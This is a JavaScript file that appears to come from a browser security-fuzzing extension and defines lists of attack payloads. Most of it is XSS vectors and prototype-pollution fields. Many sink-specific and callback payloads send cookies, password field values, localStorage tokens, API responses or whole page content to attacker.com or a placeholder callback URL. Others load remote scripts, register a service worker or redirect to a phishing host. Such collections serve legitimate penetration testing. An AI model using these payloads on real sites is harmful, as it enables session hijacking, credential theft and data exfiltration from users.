/**
 * FrogPost Extension
 * Originally Created by thisis0xczar/Lidor JFrog AppSec Team
 * Refined on: 2025-05-01
 */
window.FuzzingPayloads = {

    XSS: [
        '<img src=x onerror=alert("XSS_1")>',
        '<svg onload=console.log("XSS_2")>',
        '<script>console.log("XSS_3")</script>',
        '"><img src=x onerror=console.log("XSS_4")>',
        '<iframe src="javascript:alert(\'XSS_5\')"></iframe>',
        '<details open ontoggle="alert(\'XSS_6\')">',
        '<video><source onerror="alert(\'XSS_7\')">',
        '<body onpageshow="alert(\'XSS_8\')">',
        '<marquee onstart="console.log(\'XSS_9\')">',
        '<div onmouseover="console.log(\'XSS_10\')">Hover</div>',
        '<input autofocus onfocus="alert(\'XSS_11\')">',
        '<select autofocus onfocus="alert(\'XSS_12\')"></select>',
        '<textarea autofocus onfocus="alert(\'XSS_13\')"></textarea>',
        '<keygen autofocus onfocus="alert(\'XSS_14\')">',
        '<isindex type=image src=1 onerror=alert(\'XSS_15\')>',
        '<img src="x:gif" onerror="alert(\'XSS_16\')">',
        '<img src="data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=" onerror="alert(\'XSS_17\')">',
        '<% script>alert("XSS_18")</% script>',
        '<scr<script>ipt>console.log("XSS_19")</scr</script>ipt>',
        '<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,95,50,48,39,41))">',
        '<math><mtext><table><mglyph><style><script>console.log("XSS_21")</script>',
        '<<img src="x" onerror="console.log(\'XSS_22\')//">>',
        '<p title="onerror=console.log(\'XSS_23\')//"><img src="x" onerror=console.log(\'XSS_24\') />',
        'con\\u0073ole.log("XSS_25")',
        'window["con"+"sole"]["l"+"og"]("XSS_26")',
        'setTimeout("console.log(\'XSS_27\')")',
        'eval(String.fromCharCode(99,111,110,115,111,108,101,46,108,111,103,40,34,80,88,83,83,95,50,56,34,41))',
        '`${console.log("XSS_29")}`',
        'alert(String.fromCharCode(80,88,83,83,95,51,48))',
        'self["ev"+"al"]("con"+"sole"+"."+"log(\'XSS_31\')")',
        '(()=>{}).constructor("return console.log(\'XSS_32\')")();',
        'globalThis[\'eva\'+\'l\'](\'console.log("XSS_33")\')',
        '[].filter.constructor("return console.log(\'XSS_34\')")()',
        'javascript:void(con%73ole.log("XSS_35"))',
        'javascript://comment%0Aconsole.log("XSS_36")',
        'javascript:void%20console.log("XSS_37")',
        'java&#x73;cript:console.log("XSS_38")',
        'javascript:([,"XSS_39"].find(alert))',
        '  javascript:console.log("XSS_40")',
        'javascrip&#116;:console.log("XSS_41")',
        '\u006aavascript:console.log("XSS_42")',
        'document.body.innerHTML="<img src=x onerror=alert(\'XSS_43\')>"',
        'document.write("<script>alert(\'XSS_44\')</script>")',
        'location="javascript:alert(\'XSS_45\')"',
        'window.location.href="javascript:alert(\'XSS_46\')"',
        'setTimeout("alert(\'XSS_47\')",100)',
        'eval("alert(\'XSS_49\')")',
        'document.documentElement.innerHTML="<img src=x onerror=alert(\'XSS_50\')>"',

        '<iframe srcdoc="<script>alert(\'XSS_51\')</script>"></iframe>',
        '<a href="javascript:alert(\'XSS_52\')">Click me</a>',
        '<svg><animate onbegin=alert(\'XSS_53\') attributeName=x></svg>',
        '<svg><animate onbegin=alert(\'XSS_54\') attributeName=x></svg>',
        '<svg><set onbegin=alert(\'XSS_55\') attributeName=x></svg>',
        '<svg><script>alert(\'XSS_56\')</script></svg>',
        '<svg><style>&{alert(\'XSS_57\')}</style></svg>',
        '<math><maction actiontype="statusline#" xlink:href="javascript:alert(\'XSS_58\')">Click</maction></math>',
        '<img src=1 onerror="alert(\'XSS_59\')" style="position:fixed;left:0;top:0;width:100%;height:100%">',
        '<div style="background-image:url(javascript:alert(\'XSS_60\'))"></div>',
        '<div style="background-image:url(&#1;javascript:alert(\'XSS_61\'))"></div>',
        '<div style="behavior:url(#default#time2)" onbegin="alert(\'XSS_62\')"></div>',
        '<link rel="stylesheet" href="javascript:alert(\'XSS_63\')">',
        '<style>@import "javascript:alert(\'XSS_64\')";</style>',
        '<object data="javascript:alert(\'XSS_65\')"></object>',
        '<embed src="javascript:alert(\'XSS_66\')"></embed>',
        '<form action="javascript:alert(\'XSS_67\')"><input type="submit"></form>',
        '<isindex type=image src="javascript:alert(\'XSS_68\')">',
        '<button form="test" formaction="javascript:alert(\'XSS_69\')">Click me</button>',
        '<input onfocus="alert(\'XSS_70\')" autofocus>',
        '<input onblur="alert(\'XSS_71\')" autofocus><input autofocus>',
        '<video><source onerror="alert(\'XSS_72\')">',
        '<audio><source onerror="alert(\'XSS_73\')">',
        '<math href="javascript:alert(\'XSS_74\')">click</math>',
        'data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTXzc1Jyk8L3NjcmlwdD4=',
        'vbscript:alert(\'XSS_76\')',
        'javascript:alert(\'XSS_77\')',
        'javascript:confirm(\'XSS_78\')',
        'javascript:prompt(\'XSS_79\')',
        'javascript:document.vulnerable=true',
        'javascript:window.onerror=alert;throw\'XSS_80\'',
        '%253Cscript%253Ealert(%2527XSS_81%2527)%253C/script%253E',
        '%2536e%2561v%2561s%2563%2572%2569p%2574%253aalert(%2527XSS_82%2527)',
        '<svg onload=alert(\'XSS_83\')>',
        '<body onload=alert(\'XSS_84\')>',
        '<img src=x onload=alert(\'XSS_85\')>',
        '<body onpageshow=alert(\'XSS_86\')>',
        '<body onfocus=alert(\'XSS_87\')>',
        '<body onhashchange=alert(\'XSS_88\')><a href="#x">click</a>',
        '<body style="height:1000px" onwheel="alert(\'XSS_89\')">',
        '<div contextmenu="xss">Right-Click<menu id="xss" onshow="alert(\'XSS_90\')"></menu></div>',
        '(new Function(\'alert("XSS_91")\'))()',
        'onerror=alert;throw\'XSS_94\'',
        'this["alert"]("XSS_95")',
        'alert?.("XSS_96")',
        '[]["constructor"]["constructor"]("alert(\'XSS_97\')")()',
        '(()=>{})[\'constructor\']("alert(\'XSS_98\')")()',
        'with(document)alert(cookie)',
        '<script src="data:text/javascript,alert(\'XSS_99\')"></script>',
        '<iframe src="data:text/html,<script>alert(\'XSS_100\')</script>"></iframe>',
        '<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTXzEwMScpOzwvc2NyaXB0Pg==">',
        '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTXzEwMicpOzwvc2NyaXB0Pg==">',
        '<svg><script href="data:text/javascript,alert(\'XSS_103\')"></script></svg>',
        '<img src=x onerror=alert("XSS_104")>',
        '<svg onload=console.log("XSS_105")>',
        '<script>console.log("XSS_106")</script>',
        '"><img src=x onerror=console.log("XSS_107")>',
        '<iframe src="javascript:alert(\'XSS_108\')"></iframe>',
        '<details open ontoggle="alert(\'XSS_109\')">',
        '<video><source onerror="alert(\'XSS_110\')">',
        '<body onpageshow="alert(\'XSS_111\')">',
        '<marquee onstart="console.log(\'XSS_112\')">',
        '<div onmouseover="console.log(\'XSS_113\')">Hover</div>',
        '<input autofocus onfocus="alert(\'XSS_114\')">',
        '<select autofocus onfocus="alert(\'XSS_115\')"></select>',
        '<textarea autofocus onfocus="alert(\'XSS_116\')"></textarea>',
        '<keygen autofocus onfocus="alert(\'XSS_117\')">',
        '<isindex type=image src=1 onerror=alert(\'XSS_118\')>',
        '<img src="x:gif" onerror="alert(\'XSS_119\')">',
        '<img src="data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=" onerror="alert(\'XSS_120\')">',
        '<% script>alert("XSS_121")</% script>',
        '<scr<script>ipt>console.log("XSS_122")</scr</script>ipt>',
        '<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,95,49,50,51,39,41))">',
        '<math><mtext><table><mglyph><style><script>console.log("XSS_124")</script>',
        '<<img src="x" onerror="console.log(\'XSS_125\')//">>',
        '<p title="onerror=console.log(\'XSS_126\')//"><img src="x" onerror=console.log(\'XSS_127\') />',
        '<iframe src="javascript:alert(document.domain)"></iframe>',
        '<img src="javascript:alert(document.cookie)">',
        '<object data="javascript:alert(document.domain)"></object>',
        '<iframe srcdoc="<img src=x onerror=alert(parent.document.domain)>"></iframe>',
        '<form><button formaction="javascript:alert(document.domain)">Click</button></form>',
        '<math><mtext><template><img src=x onerror=alert(1)></template></mtext></math>',
        '<table background="javascript:alert(1)"></table>',
        '<a href="javascript:alert(1)">Click me</a>',
        '<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)">Click me</a>',
        '<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">Click me</text></a></svg>',
        '<svg><animate xlink:href="#xss" attributeName="href" values="javascript:alert(1)"/><a id="xss"><text x="20" y="20">Click me</text></a></svg>',
        '<svg><animate attributeName="onload" to="alert(1)"/></svg>',
        '<img src=1 onerror="location=\'javascript:alert(1)\'">',
        '<table><td background="javascript:alert(1)"></td></table>',
        '<div style="background-image: url(javascript:alert(1))"></div>',
        '<div style="width: expression(alert(1))"></div>',
        '<div style="background:url(&#1;javascript:alert(1))"></div>',
        '<div style="behavior: url(#default#time2)" onbegin="alert(1)"></div>',
        '<img style="xss:expr/*XSS*/ession(alert(1))">',
        '<style>@im\\port\'\\ja\\vasc\\ript:alert(1)\';</style>',
        '<style>@\\im\\port\'\\ja\\vasc\\ript:alert(1)\';</style>',
        '<style>.XSS{background-image:url("javascript:alert(1)");}</style><A CLASS=XSS></A>',
        '<meta http-equiv="refresh" content="0;url=javascript:alert(1)">',
        '<meta http-equiv="refresh" content="0;url=data:text/html,%3Cscript%3Ealert(1)%3C/script%3E">',
        '<img src onerror /" \'"= alt="onloadend=1;alert(1)//">',
        '<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" begin="0" from="" to="javascript:alert(1)" /></a></svg>',
        '<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>',
        '<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>'
    ],

    SINK_SPECIFIC: {
        eval: [
            'console.log(document.domain + " - EVAL_1")',
            '(function(){return console.log(document.location + " - EVAL_2")})()',
            'console.log("Evaluating code at "+document.URL + " - EVAL_3")',
            'alert("FrogPost_Eval_4")',
            'fetch("/api/user").then(r=>r.json()).then(d=>fetch("https://attacker.com/?eval_data="+encodeURIComponent(JSON.stringify(d))))',
            '(new Image()).src = "https://attacker.com/?eval_cookie="+document.cookie',
            'Array.from(document.querySelectorAll("input[type=password]")).map(e => e.value).join("||")',
            'document.write("<img src=\\"https://attacker.com/?eval_write="+document.cookie+"\\">")',
            'JSON.stringify(Object.keys(localStorage).map(k => ({key: k, value: localStorage.getItem(k)})))'
        ],
        innerHTML: [
            '<img src=x onerror=console.log(document.domain + " - HTML_1")>',
            '<svg onload=console.log(document.cookie + " - HTML_2")>',
            '<script>alert("FrogPost_HTML_3")</script>',
            '<iframe src="javascript:alert(document.location + \' - HTML_4\')"></iframe>',
            '<img src=1 onerror="console.log(\'innerHTML at \'+document.URL+\' - HTML_5\')">',
            '<form><input name=csrf value=html6 formaction="javascript:fetch(\'https://attacker.com/?html_form=\'+document.cookie)">',
            '<video><source onerror="fetch(\'/api/user\').then(r=>r.json()).then(d=>fetch(\'https://attacker.com/?html_video=\'+btoa(JSON.stringify(d))))">',
            '<details open ontoggle="navigator.sendBeacon(\'https://attacker.com/?html_details\', document.cookie)">',
            '<object data="data:text/html;base64,PHNjcmlwdD5mZXRjaCgnaHR0cHM6Ly9hdHRhY2tlci5jb20vP2h0bWxfb2JqZWN0PScrdG9wLmxvY2F0aW9uLmhyZWYpPC9zY3JpcHQ+"></object>'
        ],
        document_write: [
            '<script>console.log(document.domain + " - WRITE_1")</script>',
            '<img src=x onerror=console.log(document.cookie + " - WRITE_2")>',
            '<script>alert("FrogPost_WRITE_3")</script>',
            '<img src="invalid" onerror="console.log(document.location + \' - WRITE_4\')">',
            'document.write test WRITE_5 at '+document.URL,
            '<iframe src="javascript:fetch(\'/api/sensitive\').then(r=>r.text()).then(t=>location=\'https://attacker.com/?write_iframe=\'+encodeURIComponent(t))"></iframe>',
            '<script>window.addEventListener("message",e=>fetch("https://attacker.com/?write_listener="+encodeURIComponent(JSON.stringify(e.data))))</script>',
            '<applet code="javascript:console.log(document.domain + \' - WRITE_8\')">',
            '<meta http-equiv="refresh" content="0;url=data:text/html,<script>navigator.sendBeacon(\'https://attacker.com/?write_meta\',document.cookie)</script>">'
        ],
        setTimeout: [
            'console.log(document.domain + " - TIMEOUT_1")',
            'console.log(document.cookie + " - TIMEOUT_2")',
            'alert("FrogPost_TIMEOUT_3")',
            '(function(){console.log(document.location + " - TIMEOUT_4")})()',
            'console.log("setTimeout at "+document.URL + " - TIMEOUT_5")',
            'fetch("/api/user").then(r=>r.json()).then(d=>new Image().src="https://attacker.com/?timeout_img="+btoa(JSON.stringify(d)))',
            'Array.from(document.forms).forEach(f=>console.log(f.action)) // TIMEOUT_7',
            'localStorage.setItem("pwned_timeout","yes"); console.log(localStorage.getItem("pwned_timeout")) // TIMEOUT_8',
            '[].filter.constructor("debugger")() // TIMEOUT_9'
        ],
        setInterval: [
            'console.log(document.domain + " - INTERVAL_1")',
            'console.log(document.cookie + " - INTERVAL_2")',
            'alert("FrogPost_INTERVAL_3")',
            '(function(){console.log(document.location + " - INTERVAL_4")})()',
            'console.log("setInterval at "+document.URL + " - INTERVAL_5")',
            'var pw=document.querySelector("input[type=password]"); if(pw)fetch("https://attacker.com/?interval_pw="+pw.value)',
            'navigator.sendBeacon("https://attacker.com/?interval_beacon", JSON.stringify({loc:location.href,cookies:document.cookie}))',
            'function x(){document.querySelectorAll("form").forEach(f=>f.action="https://attacker.com/?interval_form")};x()',
            'window.top.location="https://phishing-site.com/?from_interval="+encodeURIComponent(location.href)'
        ],
        location_href: [
            'javascript:console.log(document.domain + " - LOC_HREF_1")',
            'javascript:console.log(document.cookie + " - LOC_HREF_2")',
            'javascript:alert("FrogPost_LOC_HREF_3")',
            'javascript:console.log("location.href at "+document.URL + " - LOC_HREF_4")',
            'javascript:fetch("/api/sensitive").then(r=>r.text()).then(t=>navigator.sendBeacon("https://attacker.com/?loc_href_beacon",t)); void(0);',
            'javascript:var x=document.createElement("script");x.src="https://attacker.com/x.js?loc_href";document.body.appendChild(x);void 0',
            'javascript:(function(){var i=document.createElement("iframe");i.src="https://attacker.com/?loc_href_iframe";i.style.opacity=0;i.style.position="absolute";document.body.appendChild(i)})(); void(0);',
            'javascript:window.addEventListener("message",m=>fetch("https://attacker.com/?loc_href_listener="+btoa(JSON.stringify(m.data)))); void(0);',
            'javascript:document.write("<script>window.top.location=\'https://attacker.com/?loc_href_write=\'+encodeURIComponent(document.referrer)</script>")',
            'data:text/html,<script>navigator.serviceWorker.register("https://attacker.com/sw_loc_href.js")</script>'
        ]
    },

    PROTOTYPE_POLLUTION: [
        { field: '__proto__.polluted_frog_1', value: true },
        { field: 'constructor.prototype.polluted_frog_2', value: true },
        { field: '__proto__.isAdmin', value: true },
        { field: '__proto__.is_admin', value: true },
        { field: '__proto__.admin', value: true },
        { field: '__proto__.enabled', value: true },
        { field: '__proto__.innerHTML', value: '<img src=x onerror=alert(\"PP_XSS\")>' },
        { field: '__proto__.src', value: 'javascript:alert(\"PP_SRC\")' },
        { field: '__proto__.href', value: 'javascript:alert(\"PP_HREF\")' },
        { field: '__proto__.onload', value: 'alert(\"PP_ONLOAD\")' },
        { field: '__proto__.toString', value: 'function() { return \"PP_TOSTRING\"; }' },
        { field: '__proto__.valueOf', value: 'function() { return alert(\"PP_VALUEOF\"); }' },
        { field: '__proto__.constructor.prototype.toString', value: 'function() { return alert(\"PP_PROTO_TOSTRING\"); }' }
    ],

    CALLBACK_URL: [
        `fetch('%%CALLBACK_URL%%?d1='+document.cookie)`,
        `<script src="%%CALLBACK_URL%%?d2=scripttag"></script>`,
        `<img src="%%CALLBACK_URL%%?d3='+document.cookie+'">`,
        `navigator.sendBeacon('%%CALLBACK_URL%%', JSON.stringify({cookie: document.cookie, location: document.location.href, referrer: document.referrer}))`,
        `var x=new XMLHttpRequest();x.open('GET','%%CALLBACK_URL%%?d5='+btoa(document.cookie));x.send()`,
        `new Image().src='%%CALLBACK_URL%%?d6='+document.cookie`,
        `document.location='%%CALLBACK_URL%%?d7='+document.domain`,
        `<iframe src="%%CALLBACK_URL%%#d8='+document.cookie" style="display:none;"></iframe>`,
        `fetch('%%CALLBACK_URL%%', {method:'POST', body:localStorage.getItem('userToken') || 'no_token'})`,
        `WebSocket('wss://'+new URL('%%CALLBACK_URL%%').host+'/?d10='+document.cookie)`,
        `window.open('%%CALLBACK_URL%%?d11='+document.cookie)`,
        `$.get('%%CALLBACK_URL%%?d12='+document.cookie)`,
        `fetch('%%CALLBACK_URL%%?d13=fetch_test').then(r => console.log('Callback fetch status: '+r.status))`,
        `<form action="%%CALLBACK_URL%%" method="post"><input name="data" value="form_submit"><button type="submit"></button></form><script>document.forms[document.forms.length-1].submit();</script>`,
        `fetch('%%CALLBACK_URL%%?storage='+encodeURIComponent(JSON.stringify({local: Object.entries(localStorage), session: Object.entries(sessionStorage)}))).catch(e => console.error(e))`,
        `fetch('%%CALLBACK_URL%%?dom='+encodeURIComponent(document.documentElement.outerHTML))`,
        `fetch('%%CALLBACK_URL%%?formData='+encodeURIComponent(Array.from(document.forms).map(f => Array.from(new FormData(f).entries())).flat()))`,
        `navigator.sendBeacon('%%CALLBACK_URL%%?allCookies', document.cookie); console.log('Beacon sent')`,
        `(async function(){try{const r=await fetch('/api/user');const d=await r.json();fetch('%%CALLBACK_URL%%?api='+encodeURIComponent(JSON.stringify(d)))}catch(e){fetch('%%CALLBACK_URL%%?error='+e.message)}})()`,
        `var s=document.createElement('script');s.src='%%CALLBACK_URL%%?script_load=1';document.body.appendChild(s)`,
        `(function(){try{var info={url:location.href,cookie:document.cookie,userAgent:navigator.userAgent,screen:{width:screen.width,height:screen.height,colorDepth:screen.colorDepth},time:new Date().toString(),timezone:Intl.DateTimeFormat().resolvedOptions().timeZone,lang:navigator.language};fetch('%%CALLBACK_URL%%',{method:'POST',body:JSON.stringify(info)})}catch(e){console.error(e)}})()`,
        `navigator.sendBeacon('%%CALLBACK_URL%%', new URLSearchParams({data: JSON.stringify({location: window.location.href, topLocation: window.top.location.href, referrer: document.referrer})}))`,
        `(new Image()).src = '%%CALLBACK_URL%%?d='+(document.getElementById('password') ? document.getElementById('password').value : 'no_password_field')`
    ]
};
